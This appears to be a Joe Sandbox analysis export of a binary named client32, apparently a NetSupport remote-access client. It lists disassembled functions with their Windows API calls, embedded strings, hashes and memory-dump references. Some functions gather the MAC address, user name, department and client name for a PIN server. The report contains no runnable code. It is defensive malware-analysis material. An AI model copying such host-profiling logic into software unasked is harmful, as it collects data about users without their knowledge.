Opcode ID: dfffee5da6f8f652f6e10890b010b50e35bfec5ac8e347496dcf34579b5a3576
Instruction ID: 33b4a6bfb3ab8d131a57f0024b2a89fd29acec5530548d11cae89e8b1d3271f5
Opcode Fuzzy Hash: dfffee5da6f8f652f6e10890b010b50e35bfec5ac8e347496dcf34579b5a3576
Instruction Fuzzy Hash: A4017175344305EFE7208E55CC99F5B7BB8EB55775F108228FB1597284E670E4058BA0

Function 68C80BB0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 46libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(IPHLPAPI.DLL), ref: 68C80BB8
GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 68C80BCB
_malloc.LIBCMT ref: 68C80BF3

Part of subcall function 68C81B69: __FF_MSGBANNER.LIBCMT ref: 68C81B82
Part of subcall function 68C81B69: __NMSG_WRITE.LIBCMT ref: 68C81B89
Part of subcall function 68C81B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,68C8D3C1,68C86E81,00000001,68C86E81,?,68C8F447,00000018,68CA7738,0000000C,68C8F4D7), ref: 68C81BAE

_free.LIBCMT ref: 68C80BEB

Part of subcall function 68C81BFD: HeapFree.KERNEL32(00000000,00000000), ref: 68C81C13
Part of subcall function 68C81BFD: GetLastError.KERNEL32(00000000), ref: 68C81C25

_free.LIBCMT ref: 68C80C10

Strings

IPHLPAPI.DLL, xrefs: 68C80BB1
GetAdaptersInfo, xrefs: 68C80BC5

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: Heap_free$AddressAllocateErrorFreeLastLibraryLoadProc_malloc
String ID: GetAdaptersInfo$IPHLPAPI.DLL
API String ID: 1157017740-2359281783
Opcode ID: 062a2f5447f35acc5b942ff720fff986ac044a2a51be8f7d6f60cc0b2e2a0d5d
Instruction ID: 0f70c6e36293af83d7276a96359cc3ba3a12e0ec55467e665d9d4006ed7cc77c
Opcode Fuzzy Hash: 062a2f5447f35acc5b942ff720fff986ac044a2a51be8f7d6f60cc0b2e2a0d5d
Instruction Fuzzy Hash: A3F08CFA5417429FD6209F74AC98D2B7AECAF4560CB50482DE56ACB600FA35E842C760

Function 110033B0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 41windowCOMMON

Download Yara Rule

APIs

LoadMenuA.USER32(00000000,00002EFF), ref: 110033BE
GetSubMenu.USER32(00000000,00000000), ref: 110033EA
GetSubMenu.USER32(00000000,00000000), ref: 1100340C
DestroyMenu.USER32(00000000), ref: 1100341A

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Strings

..\CTL32\annotate.cpp, xrefs: 110033CF, 110033F7
hSub, xrefs: 110033FC
hMenu, xrefs: 110033D4

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
String ID: ..\CTL32\annotate.cpp$hMenu$hSub
API String ID: 468487828-934300333
Opcode ID: 4bbcc618e98ef98e9cc3961995019deef03965a6bc052ed1dd22c5c51f3fda12
Instruction ID: 24594387450efb2066981165f5525a36b814e5bc10ecad7e7e85ab1dcfd37f25
Opcode Fuzzy Hash: 4bbcc618e98ef98e9cc3961995019deef03965a6bc052ed1dd22c5c51f3fda12
Instruction Fuzzy Hash: 71F0E93AF4066677D61352666CC5F4FE66C8B91AA8F110071F614BA684EE11A80051EA

Function 110ED140 Relevance: 12.1, APIs: 8, Instructions: 84filememoryCOMMON

Download Yara Rule

APIs

GetFileSize.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,1112E5E6,00000000,?), ref: 110ED158
ReadFile.KERNEL32(00000000,00000000,0000000E,?,00000000,?,1112E5E6,00000000,?), ref: 110ED16D
GlobalAlloc.KERNEL32(00000042,-0000000E,00000000), ref: 110ED18F
GlobalLock.KERNEL32(00000000), ref: 110ED19C
ReadFile.KERNEL32(00000000,00000000,-0000000E,0000000E,00000000), ref: 110ED1AB
GlobalUnlock.KERNEL32(00000000), ref: 110ED1BB
GlobalUnlock.KERNEL32(00000000), ref: 110ED1D5
GlobalFree.KERNEL32(00000000), ref: 110ED1DC

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Global$File$ReadUnlock$AllocFreeLockSize
String ID:
API String ID: 3489003387-0
Opcode ID: ac9894072b1dc3d21a11d3d1ba5530177ea57d988780f7ec85b0a03793c60cba
Instruction ID: db3aae85cbeca24dbd9e457748b34ba45ed53121808abb5c6b0ad0e7882c1e57
Opcode Fuzzy Hash: ac9894072b1dc3d21a11d3d1ba5530177ea57d988780f7ec85b0a03793c60cba
Instruction Fuzzy Hash: C9218332A0111AAFD701DFA9C889BFEF7BCEB45219F1040ABFB05D6140DB34990187A2

Function 1103D330 Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 319COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 1103D3D1
_memmove.LIBCMT ref: 1103D3DE

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Part of subcall function 1103D0B0: Sleep.KERNEL32(000001F4,00000000,?), ref: 1103D0E1

Part of subcall function 110290F0: _strrchr.LIBCMT ref: 110291E5
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 11029224

Strings

PF%sinclude:*exclude:, xrefs: 1103D492
redirect:, xrefs: 1103D4A8
e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 1103D36F, 1103D39E, 1103D3FD, 1103D433, 1103D47C, 1103D4E9, 1103D542, 1103D5CC, 1103D5FF, 1103D669, 1103D6A0
IsA(), xrefs: 1103D374, 1103D3A3, 1103D402, 1103D438, 1103D481, 1103D4EE, 1103D547, 1103D5D1, 1103D604, 1103D66E, 1103D6A5

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ExitProcess$ErrorLastMessageSleep_memmove_memset_strrchrwsprintf
String ID: IsA()$PF%sinclude:*exclude:$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$redirect:
API String ID: 118650250-3293259664
Opcode ID: 6de04acfd1c6b93234f2aaac1ec6cebecc2511945347d61253f2623e43f034eb
Instruction ID: 8883845aa1adcb6b462271895c3eb4188d935db878da715d2f936e5278910226
Opcode Fuzzy Hash: 6de04acfd1c6b93234f2aaac1ec6cebecc2511945347d61253f2623e43f034eb
Instruction Fuzzy Hash: 85B1D234E0195A9FDB06DF98CC90FEDB3B5AF89309F448154E82567380EB34A908CBD1

Function 11043050 Relevance: 10.7, APIs: 7, Instructions: 171COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 110430DC

Part of subcall function 1115F3B5: HeapFree.KERNEL32(00000000,00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3CB
Part of subcall function 1115F3B5: GetLastError.KERNEL32(00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3DD

_free.LIBCMT ref: 110430FC
_strncpy.LIBCMT ref: 1104312A
_strncpy.LIBCMT ref: 11043167
_strncpy.LIBCMT ref: 110431B2
_strncpy.LIBCMT ref: 110431F2
_strncpy.LIBCMT ref: 1104323B

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _strncpy$_free$ErrorFreeHeapLast
String ID:
API String ID: 1231584600-0
Opcode ID: 57f5ffb5089c12c02a377bb6fa8bf421173bcb8552d8deb20583c806e30e8182
Instruction ID: 3e0d8ed6fad75e9b70bada9a66dea6ffd8c5f444cdc47759be8d9c1188c0d16e
Opcode Fuzzy Hash: 57f5ffb5089c12c02a377bb6fa8bf421173bcb8552d8deb20583c806e30e8182
Instruction Fuzzy Hash: FB615DB5E047199FD760CFB9C884BCAFBF9BB55308F0049ADD58997200DAB4A980CF91

Function 1101F140 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 151COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 1101F1B1

Part of subcall function 11141240: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 111412AD
Part of subcall function 11141240: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,?), ref: 111412EE
Part of subcall function 11141240: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 1114134B

SHGetFolderPathA.SHFOLDER(00000000,00000005,00000000,00000000,00000000), ref: 1101F2C5
GetSaveFileNameA.COMDLG32(?), ref: 1101F2E7
_fputs.LIBCMT ref: 1101F313

Strings

ChatPath, xrefs: 1101F2A1
X, xrefs: 1101F1C1

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: FolderPath$FileName$ModuleSave_fputs_memset
String ID: ChatPath$X
API String ID: 2661292734-3955712077
Opcode ID: 7d7448241aee43a2d8f22d35a57381c1f70013038142bcfdf2693d044c7d6820
Instruction ID: 6a45e0ccd222e521db2cf8660e7e75a9c6c8819791f7e0b2186df894ceae34f3
Opcode Fuzzy Hash: 7d7448241aee43a2d8f22d35a57381c1f70013038142bcfdf2693d044c7d6820
Instruction Fuzzy Hash: 6C51C275E043299FEB21DF60CC48BDEFBB4AF45704F1041D9D909AB280EB75AA84CB91

Function 68C670F0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 124COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 68C6711D
_memset.LIBCMT ref: 68C671DE
_memmove.LIBCMT ref: 68C67215
_free.LIBCMT ref: 68C6721B

Strings

SENDER, xrefs: 68C67158
MSG, xrefs: 68C67140

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: _memset$_free_memmove
String ID: MSG$SENDER
API String ID: 3114187808-3313591108
Opcode ID: d6bb72af2a82edc74ca5e6d8af42a062d484041e399cecfe5972530a69da45f8
Instruction ID: 01d7986edc7816dda1c36ffbe8f55c2ee8d4c75f574c97bf968a6eac27735195
Opcode Fuzzy Hash: d6bb72af2a82edc74ca5e6d8af42a062d484041e399cecfe5972530a69da45f8
Instruction Fuzzy Hash: 4A414FB5C002189AEB20DF688C41BAEBBF4BB04314F9481E9E55DA7240FF309A95DF91

Function 68C75C90 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 104COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 68C75CBF

Part of subcall function 68C733A0: wsprintfA.USER32 ref: 68C734FD

Part of subcall function 68C77D00: __vswprintf.LIBCMT ref: 68C77D26

Part of subcall function 68C77B60: _sprintf.LIBCMT ref: 68C77B77

Part of subcall function 68C777E0: _free.LIBCMT ref: 68C777EF

Strings

PIN=%s, xrefs: 68C75D6E
226546, xrefs: 68C75D51
CLIENT_NAME=%s, xrefs: 68C75D5C
CMD=CLEAR_PIN, xrefs: 68C75D46
PINserver, xrefs: 68C75CD0

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: __vswprintf_free_memset_sprintfwsprintf
String ID: 226546$CLIENT_NAME=%s$CMD=CLEAR_PIN$PIN=%s$PINserver
API String ID: 2968883096-364928423
Opcode ID: 48baf67577699ffdc9297d6846d5900e45973c40acab0b953ec06992e3c7033f
Instruction ID: cdf67d9c7fc61a651a46ce79061564384b1c94f104927d77317d6352b959f1b2
Opcode Fuzzy Hash: 48baf67577699ffdc9297d6846d5900e45973c40acab0b953ec06992e3c7033f
Instruction Fuzzy Hash: 80314376D0011CAADB20DB759C95FEE77B8EB48214F9082A9E50DE7181FF346A848B60

Function 68C66CC0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 96libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 68C66D0A
GetProcAddress.KERNEL32(?,InternetReadFile), ref: 68C66D72
SetLastError.KERNEL32(00000078,?,68C6B586,00000000,00000000,0000002C,?,?,00000000,0000002B,?,?), ref: 68C66DCC
SetLastError.KERNEL32(00000078,00000000,000000C8,774CE010,?,68C6B586,00000000,00000000,0000002C,?,?,00000000,0000002B,?,?), ref: 68C66DD6

Strings

InternetQueryDataAvailable, xrefs: 68C66D04
InternetReadFile, xrefs: 68C66D6C

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: AddressErrorLastProc
String ID: InternetQueryDataAvailable$InternetReadFile
API String ID: 199729137-1434219782
Opcode ID: 72b8d0a238e94104c4a67f111d6a6b893639ef92665eaf602354d059591cc9e3
Instruction ID: ba2daed00ea663c5a33144f87d2c2c5ec0ff38328562eb434773a7192fc571d4
Opcode Fuzzy Hash: 72b8d0a238e94104c4a67f111d6a6b893639ef92665eaf602354d059591cc9e3
Instruction Fuzzy Hash: 99317875A04299EFCB60DF58C8C0AADB7F8FB49319F5044B9EA8997200EA709DC5CF50

Function 68C6B8E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 86COMMON

Download Yara Rule

APIs

_strtok.LIBCMT ref: 68C6B941
_free.LIBCMT ref: 68C6B952
_malloc.LIBCMT ref: 68C6B970
_free.LIBCMT ref: 68C6B999
_strtok.LIBCMT ref: 68C6B9A5

Part of subcall function 68C77F80: _memset.LIBCMT ref: 68C77F9F
Part of subcall function 68C77F80: LoadLibraryA.KERNEL32(iphlpapi.dll,?,00000000,?,?,?,?,?,?,?,?,68C6B916,?,00000100,00000006,00000001), ref: 68C77FAC
Part of subcall function 68C77F80: GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 68C77FCB
Part of subcall function 68C77F80: _malloc.LIBCMT ref: 68C77FFB
Part of subcall function 68C77F80: wsprintfA.USER32 ref: 68C7807C

Part of subcall function 68C77F80: _free.LIBCMT ref: 68C78110
Part of subcall function 68C77F80: FreeLibrary.KERNEL32(00000000,?,00000000,?), ref: 68C7811C

Strings

MACADDRESS=%s, xrefs: 68C6B98D

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: _free$Library_malloc_strtok$AddressFreeLoadProc_memsetwsprintf
String ID: MACADDRESS=%s
API String ID: 905297018-795797190
Opcode ID: 4ae29b1045b24ce22c7ebebf279055c05513b332ae9c229f83b2f306e7afd24c
Instruction ID: 453393208a81876c7ae6258d9a5f814123dcd751a06e02be8b55172548696704
Opcode Fuzzy Hash: 4ae29b1045b24ce22c7ebebf279055c05513b332ae9c229f83b2f306e7afd24c
Instruction Fuzzy Hash: 7721BEFA980209A7D71096385C85FFA76BC9F45728FC00164FE545B280FAB1D94182D0

Function 68C6BC60 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 68C65060: _free.LIBCMT ref: 68C6506A
Part of subcall function 68C65060: _malloc.LIBCMT ref: 68C65090

Part of subcall function 68C77D00: __vswprintf.LIBCMT ref: 68C77D26

_free.LIBCMT ref: 68C6BCBA

Part of subcall function 68C81BFD: HeapFree.KERNEL32(00000000,00000000), ref: 68C81C13
Part of subcall function 68C81BFD: GetLastError.KERNEL32(00000000), ref: 68C81C25

_free.LIBCMT ref: 68C6BCEC

Strings

DEPT=%s, xrefs: 68C6BCE0
USER=%s, xrefs: 68C6BCAE
APPTYPE=%d, xrefs: 68C6BCFF
CMD=USERSTATUS, xrefs: 68C6BC81

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast__vswprintf_malloc
String ID: APPTYPE=%d$CMD=USERSTATUS$DEPT=%s$USER=%s
API String ID: 3180605519-731630419
Opcode ID: 1381ebfedbfd0aba9387cea00bf65cc0da9fe059ac8c69e117e3a90559b88071
Instruction ID: ee6e39a1f5c7f131ffc21bc4395d772fbf67a0a6f0193860e6b3d790d6146804
Opcode Fuzzy Hash: 1381ebfedbfd0aba9387cea00bf65cc0da9fe059ac8c69e117e3a90559b88071
Instruction Fuzzy Hash: FA2181BA90010C7BDB10DBA4DC81EFF77BCDF44618F908519AA15A7140FB30E64587E0

